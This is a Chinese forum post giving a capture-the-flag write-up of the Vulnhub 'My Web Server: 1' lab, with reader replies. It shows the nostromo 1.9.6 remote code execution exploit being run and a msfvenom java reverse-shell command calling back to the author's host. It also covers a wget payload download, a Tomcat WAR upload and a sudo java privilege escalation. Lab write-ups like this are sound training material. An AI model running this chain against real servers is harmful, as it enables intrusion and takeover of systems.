首页
社区
课程
招聘
[原创]CTF_Vulnhub My Web Server:1—Writeup
发表于: 2020-4-18 15:16 914

[原创]CTF_Vulnhub My Web Server:1—Writeup

2020-4-18 15:16
914

Get Box:https://www.vulnhub.com/entry/my-web-server-1,463/

 

下载好OVF后直接导入虚拟机即可

不错可以直接看到IP,那么就打开kali linux开始吧

打开卡里二话不说直接一顿NMAP

可以很清楚的看到22,80,2222,3306,8009,8080,还有8081端口开放

查看80端口 还有8080 80801 2222

随便尝试一下看看是否存在默认密码等

很明显失败了

再看看8081端口

类似于一个博客吧

再看看2222端口

哦天呐太多好看的小姐姐了吧

也是一个类似博客的网页

那么现在就直接进入正题吧通过dirb nikto searchsploit等工具的信息收集发现searchsploit发现2222号端口的nostromo1.9.6有远程代码执行漏洞

dirb大量的扫描结果

nikto扫描结果

Searchsploit扫描结果

关于这个nostromo我在看雪论坛也发现一篇翻译的文章 有兴趣可以去看看(https://bbs.pediy.com/thread-256798.htm)

首先cp

直接python会报错 我开始还以为是程序问题 后来发现直接注释掉就行

用法比较简单就是IP +端口+命令

先试试python 47837.py 192.168.0.100 2222 whoami

python 47837.py 192.168.0.100 2222 id 

那么先GETSHELL吧

 用kali自带的

改自己卡里IP和你要的端口 随意奥

启动阿帕奇

Nc start

然后python -c import“pty;pty.spawn(‘/bin/bash’)

通过查看tomcat-users.xml可以发现TOMCAT的管理后台密码

 

msfvenom生成一个war

然后上传即可


然后访问http://192.168.0.100:8080/exp/

现在已经切换到了TOMCAT用户 其实本来不想这么麻烦的 只是我试了一下直接切换TOMCAT用户 能用到的密码都失败了

Sudo -l

msfvenom -p java/shell_reverse_tcp LHOST=192.168.0.108 LPORT=7775 -f jar > expjar.jar

启动NC监听并把生成的jar复制到var/www/html目录下

Wget http://192.168.0.108/expjar.jar

然后sudo /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java -jar ./expjar.jar


完!

(注:如文章内有打错的字或者有不同看法的可以评论指出!谢谢)

博客:Blog.CatGames.cn

邮箱:root@R0inSecurity.com


[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

收藏
免费 2
支持
分享
最新回复 (4)
雪    币: 13904
活跃值: (17017)
能力值: ( LV12,RANK:290 )
在线值:
发帖
回帖
粉丝
2
mark,楼主辛苦了
2020-4-18 15:26
0
雪    币: 452
活跃值: (6128)
能力值: ( LV12,RANK:580 )
在线值:
发帖
回帖
粉丝
3
pureGavin mark,楼主辛苦了
2020-4-18 16:19
0
雪    币: 83
活跃值: (1082)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
4
mark
2020-4-19 08:39
0
雪    币: 280
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
5
很敬仰你,我不知道怎么加您好友啊。您加下我吧。这是我微信18279000092
2020-7-17 06:44
0
游客
登录 | 注册 方可回帖
返回
//